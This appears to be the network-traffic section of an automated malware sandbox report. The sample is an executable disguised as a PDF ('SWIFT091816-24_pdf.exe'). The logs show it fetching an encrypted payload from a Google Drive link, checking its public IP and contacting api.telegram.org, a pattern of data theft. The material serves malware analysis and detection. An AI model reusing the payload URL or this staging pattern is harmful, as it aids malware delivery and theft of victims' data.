                                                                                                                              Dec 16, 2024 09:05:59.010251999 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:59.012065887 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:59.078331947 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:59.078958035 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:59.198379040 CET8049866193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:59.198458910 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:59.198690891 CET8049878193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:59.198761940 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:59.198889971 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:59.318608999 CET8049878193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:00.557987928 CET8049878193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:00.559334040 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:00.559379101 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:00.559607029 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:00.559787989 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:00.559798002 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:00.599277020 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:01.921646118 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:01.924176931 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:01.924185038 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:01.924268007 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:01.924278021 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:02.572581053 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:02.572751045 CET44349883149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:02.572865009 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:02.573100090 CET49883443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:02.590357065 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:02.591135979 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:02.710591078 CET8049878193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:02.710678101 CET4987880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:02.710913897 CET8049889193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:02.711026907 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:02.711199045 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:02.830842972 CET8049889193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:03.982750893 CET8049889193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:03.987715960 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:03.987802982 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:03.987893105 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:03.988151073 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:03.988187075 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:04.036623955 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:05.356656075 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:05.358299017 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:05.358330965 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:05.358393908 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:05.358407021 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:06.332748890 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:06.333041906 CET44349891149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:06.333137989 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:09.018450022 CET49891443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:06:09.020941019 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:09.022054911 CET4990680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:09.141216993 CET8049889193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:09.141294956 CET4988980192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:09.141726017 CET8049906193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:09.141840935 CET4990680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:09.141936064 CET4990680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:06:09.261701107 CET8049906193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:10.473161936 CET8049906193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:06:10.521009922 CET4990680192.168.2.4193.122.6.168
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 16, 2024 09:05:31.004317999 CET5637353192.168.2.41.1.1.1
                                                                                                                              Dec 16, 2024 09:05:31.141685009 CET53563731.1.1.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.791688919 CET5929353192.168.2.41.1.1.1
                                                                                                                              Dec 16, 2024 09:05:33.930509090 CET53592931.1.1.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.480732918 CET6005253192.168.2.41.1.1.1
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET53600521.1.1.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:42.007061005 CET5897253192.168.2.41.1.1.1
                                                                                                                              Dec 16, 2024 09:05:42.147551060 CET53589721.1.1.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:49.665357113 CET5314153192.168.2.41.1.1.1
                                                                                                                              Dec 16, 2024 09:05:49.802562952 CET53531411.1.1.1192.168.2.4
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 16, 2024 09:05:31.004317999 CET192.168.2.41.1.1.10x673cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:33.791688919 CET192.168.2.41.1.1.10xf916Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.480732918 CET192.168.2.41.1.1.10x493cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:42.007061005 CET192.168.2.41.1.1.10x480aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:49.665357113 CET192.168.2.41.1.1.10xab3Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 16, 2024 09:05:31.141685009 CET1.1.1.1192.168.2.40x673cNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:33.930509090 CET1.1.1.1192.168.2.40xf916No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:39.844990969 CET1.1.1.1192.168.2.40x493cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:42.147551060 CET1.1.1.1192.168.2.40x480aNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:42.147551060 CET1.1.1.1192.168.2.40x480aNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                                              Dec 16, 2024 09:05:49.802562952 CET1.1.1.1192.168.2.40xab3No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                              • drive.google.com
                                                                                                                              • drive.usercontent.google.com
                                                                                                                              • reallyfreegeoip.org
                                                                                                                              • api.telegram.org
                                                                                                                              • checkip.dyndns.org
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449826193.122.6.168807844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:05:39.969947100 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 16, 2024 09:05:41.243218899 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:41 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 58b624d2afa433388809cedcb94f2d57
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                              Dec 16, 2024 09:05:41.247028112 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 16, 2024 09:05:41.675928116 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:41 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 1bfe8623cf824adacba716b221ec8894
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                              Dec 16, 2024 09:05:49.255486965 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 16, 2024 09:05:49.660937071 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:49 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 910715d4ca2e9cdc8974212cd4e90859
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449858193.122.6.168807844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:05:52.194066048 CET127OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Dec 16, 2024 09:05:53.462896109 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:53 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 84cdb87040eafcd7863705d4441c7695
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449866193.122.6.168807844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:05:55.650152922 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 16, 2024 09:05:56.931538105 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:56 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 528548c883e4a6b6a33fd10ca4c345de
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449878193.122.6.168807844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:05:59.198889971 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 16, 2024 09:06:00.557987928 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:06:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 2e70703aad696c6bded3242b1faab0d8
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449889193.122.6.168807844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:06:02.711199045 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 16, 2024 09:06:03.982750893 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:06:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: 2ade4db7a499d15f4b0a1ac39c615260
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              5192.168.2.449906193.122.6.16880
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 16, 2024 09:06:09.141936064 CET151OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                              Host: checkip.dyndns.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 16, 2024 09:06:10.473161936 CET321INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 16 Dec 2024 08:06:10 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 104
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              X-Request-ID: c34c2afd7683f9a9b2087734b0f18373
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449804172.217.19.1744437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:32 UTC216OUTGET /uc?export=download&id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Host: drive.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-16 08:05:33 UTC1920INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:33 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'nonce-vdb5r_RsT_sxRF8feRaKSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449812142.250.181.14437844C:\Users\user\Desktop\SWIFT091816-24_pdf.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-16 08:05:35 UTC258OUTGET /download?id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT&export=download HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-16 08:05:38 UTC4932INHTTP/1.1 200 OK
                                                                                                                              X-GUploader-UploadID: AFiumC4igQs9Xg5spUEFNA70nyuDpVKmGW1xWxsIEcFwaAKEhC_xbqPOfD-iwomMz1HRsJEs
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Disposition: attachment; filename="mUOgRrhkkIe3.bin"
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 94272
                                                                                                                              Last-Modified: Mon, 16 Dec 2024 03:27:48 GMT
                                                                                                                              Date: Mon, 16 Dec 2024 08:05:38 GMT
                                                                                                                              Expires: Mon, 16 Dec 2024 08:05:38 GMT
                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                              X-Goog-Hash: crc32c=A4aBPw==
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close
                                                                                                                              2024-12-16 08:05:38 UTC4932INData Raw: f6 30 b1 26 18 ed ef 78 68 26 6c 50 ae da 03 a8 80 31 12 47 a5 c4 e7 92 ce 89 16 20 4b b8 41 57 0c 9d 27 eb 53 20 8d cc 92 a8 27 2d fa 60 15 1a d5 18 9f fd e4 c9 a4 a9 0d 77 fa 96 ff 1d 69 b4 01 af dc 40 66 fb da b2 d9 cd 9d 4f b9 e7 1d ed c8 1f 36 1a ec 79 44 98 07 b0 10 77 f3 04 0e 77 4b 7d b5 8b 57 4b f0 ce 9b 7f e9 10 05 b8 60 84 f4 c7 f7 de 1b 77 80 e0 c5 c2 c9 c7 4f 47 cd aa 5b 0a bf ad f1 df 4d e4 44 e8 4e 29 d0 c9 d1 7a 6e d7 4e da a6 de e9 00 e1 18 90 48 50 5e 57 27 57 6e da c2 69 5e 4c 40 56 60 9d fb 2d d9 06 fc 35 cd ab a4 03 35 12 c1 64 7e a8 8f 41 42 aa 9c 64 e1 ac 8f e0 ea 20 34 49 af b1 3d 5f da 4b 57 e9 d7 4d 17 a5 ac 1d 93 b5 3a 82 ce 60 36 cc 9f 39 73 9b 1a 10 18 95 0f c2 ab 54 0f 34 01 7d 5a f7 94 97 00 71 25 46 e7 6b c0 de 62 db 87 43
                                                                                                                              Data Ascii: 0&xh&lP1G KAW'S '-`wi@fO6yDwwK}WK`wOG[MDN)znNHP^W'Wni^L@V`-55d~ABd 4I=_KWM:`69sT4}Zq%FkbC
